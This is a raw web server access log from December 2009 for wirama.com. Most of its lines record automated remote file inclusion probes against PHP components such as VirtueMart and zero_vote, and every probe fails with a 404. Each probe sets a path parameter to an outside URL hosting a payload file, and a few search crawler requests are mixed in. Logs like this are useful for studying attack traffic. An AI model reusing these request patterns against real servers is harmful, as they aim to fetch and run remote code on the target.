91.192.20.164 - - [01/Dec/2009:01:33:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:06 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:11 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:11 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:15 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:21 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:41:07 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:41:23 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:41:29 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:41:40 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:41:54 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:42:36 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.75 - - [01/Dec/2009:01:48:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:49:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:49:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:49:29 -0800] "GET /logs/access_090701.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.13.191.76 - - [01/Dec/2009:01:50:30 -0800] "GET /skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
195.13.191.76 - - [01/Dec/2009:01:50:30 -0800] "GET /logs/access_090801.log//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
195.13.191.76 - - [01/Dec/2009:01:50:32 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
219.142.53.16 - - [01/Dec/2009:01:53:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "wirama.com"
219.142.53.31 - - [01/Dec/2009:01:53:38 -0800] "GET / HTTP/1.0" 200 900 "-" "librabot/2.0 (+http://academic.research.microsoft.com/)" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:55:15 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:55:15 -0800] "GET /include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:55:15 -0800] "GET /logs/access_090501.log//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:56:07 -0800] "GET /include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:56:07 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:56:07 -0800] "GET /logs/access_090501.log//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:56:11 -0800] "GET /logs/access_090731.log//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:01:56:17 -0800] "GET /logs/access_090731.log//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.75 - - [01/Dec/2009:01:57:56 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
195.13.191.76 - - [01/Dec/2009:02:02:22 -0800] "GET /logs/access_090501.log//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
195.13.191.76 - - [01/Dec/2009:02:06:21 -0800] "GET /skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.803" "wirama.com"
195.13.191.76 - - [01/Dec/2009:02:06:23 -0800] "GET /logs/access_090331.log//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
195.13.191.76 - - [01/Dec/2009:02:06:23 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
80.82.115.41 - - [01/Dec/2009:02:06:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:02:06:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:02:06:40 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:02:06:50 -0800] "GET /logs/access_090701.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.13.191.76 - - [01/Dec/2009:02:07:01 -0800] "GET /logs/access_090801.log//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
61.6.163.20 - - [01/Dec/2009:02:13:55 -0800] "GET /logs/access.log HTTP/1.1" 200 109745 "-" "Mozilla/8.0" "www.wirama.com"
195.13.191.76 - - [01/Dec/2009:02:14:56 -0800] "GET /logs/access_090801.log%20//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
65.55.207.95 - - [01/Dec/2009:02:15:58 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
195.13.191.76 - - [01/Dec/2009:02:18:53 -0800] "GET /logs/access_090501.log%20//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:24:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:24:32 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:24:32 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:00 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:00 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:05 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:25:05 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:26:01 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.106.21.45 - - [01/Dec/2009:02:26:07 -0800] "GET /logs///include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.106.21.45 - - [01/Dec/2009:02:26:07 -0800] "GET //include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.106.21.45 - - [01/Dec/2009:02:26:07 -0800] "GET /logs/access.log///include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:26:09 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:26:20 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.155 - - [01/Dec/2009:02:27:00 -0800] "GET /_private/?N=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
80.82.115.41 - - [01/Dec/2009:02:27:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:02:27:37 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:02:27:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.13.191.76 - - [01/Dec/2009:02:28:07 -0800] "GET /logs/access_090330.log//skin/zero_vote/login.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:03 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:03 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:40 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:40 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:32:40 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:35 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:35 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:35 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:57 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:57 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:33:57 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:34:18 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:34:19 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:02:35:14 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:35:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:35:14 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:35:14 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.210 - - [01/Dec/2009:02:35:57 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:38:25 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:38:25 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:38:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:38:25 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.101.214.54 - - [01/Dec/2009:02:39:07 -0800] "GET //include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.101.214.54 - - [01/Dec/2009:02:39:07 -0800] "GET /logs/access.log///include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.101.214.54 - - [01/Dec/2009:02:39:10 -0800] "GET /logs///include/prodler.class.php?sPath=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:40:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:40:14 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:40:14 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:40:14 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.18 - - [01/Dec/2009:02:40:29 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:45:57 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:45:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:45:57 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:47:18 -0800] "GET /skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:47:18 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:47:18 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.31.105.19 - - [01/Dec/2009:02:52:40 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [01/Dec/2009:02:54:35 -0800] "GET /logs/access.log//include/write.php?dir=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:02:54:35 -0800] "GET /include/write.php?dir=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [01/Dec/2009:02:54:35 -0800] "GET /logs//include/write.php?dir=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.31.105.19 - - [01/Dec/2009:02:54:53 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [01/Dec/2009:02:55:23 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:55:57 -0800] "GET /include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:55:57 -0800] "GET /logs//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:55:57 -0800] "GET /logs/access.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:10 -0800] "GET /include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:11 -0800] "GET /logs//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:11 -0800] "GET /include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:11 -0800] "GET /logs/access.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:12 -0800] "GET /logs/access.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:12 -0800] "GET /logs//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:29 -0800] "GET /include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:29 -0800] "GET /logs//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
